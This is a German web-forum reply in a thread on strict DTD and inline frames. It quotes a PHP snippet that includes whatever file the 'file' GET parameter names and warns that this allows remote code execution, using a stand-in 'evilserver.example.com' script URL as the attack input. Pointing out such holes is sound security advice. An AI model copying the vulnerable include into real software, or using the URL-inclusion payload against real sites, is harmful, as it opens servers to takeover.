Sven Rautenberg: DTD strict vs Inline Frames

Beitrag lesen

SELF-Forum

DTD strict vs Inline Frames

Sven Rautenberg Homepage des Autors
Informationen zu den Bewertungsregeln

Moin!

Schreibe, an die Stelle, an der sich z.Zt. der iframe befindet also einfach

<?php
if (isset($_GET["file"]))
include ($_GET["file"])
else
include "Startseite.inc"
?>

  
Wenn du möchtest, dass beliebiger externer Code ausgeführt werden soll, dann kannst du das natürlich so machen.  
  
Denk einfach nur folgendes Szenario: allow\_url\_fopen = true, $\_GET['file'] = "http://evilserver.example.com/evilscript.txt" und in dieser Datei steht dann PHP-Schadcode.  
  
 - Sven Rautenberg

-- 
"Love your nation - respect the others."
Beitrag melden
Informationen zu den Bewertungsregeln
0 25

DTD strict vs Inline Frames

Wastl
  • design/layout
  1. 0
    D.R.
    1. 0
      Wastl
      1. 0
        D.R.
        1. 0
          Sven Rautenberg
          1. 0
            D.R.
            1. 0
              Der Martin
  2. 0
    Sven Rautenberg
    1. 0
      Wastl
      1. 0
        Sven Rautenberg
      2. 0
        Tomas
  3. 0
    Aristo
    1. 0
      Sven Rautenberg
      1. 0
        Aristo
    2. 0
      wahsaga
      1. 0
        Aristo
        1. 0
          wahsaga
          1. 0
            Aristo
            1. 0
              wahsaga
              1. 0
                Aristo
                1. 0
                  Daniel unreg
  4. 0
    Wastl
    1. 1
      wahsaga
    2. 0
      Orlando
    3. 0
      Daniel unreg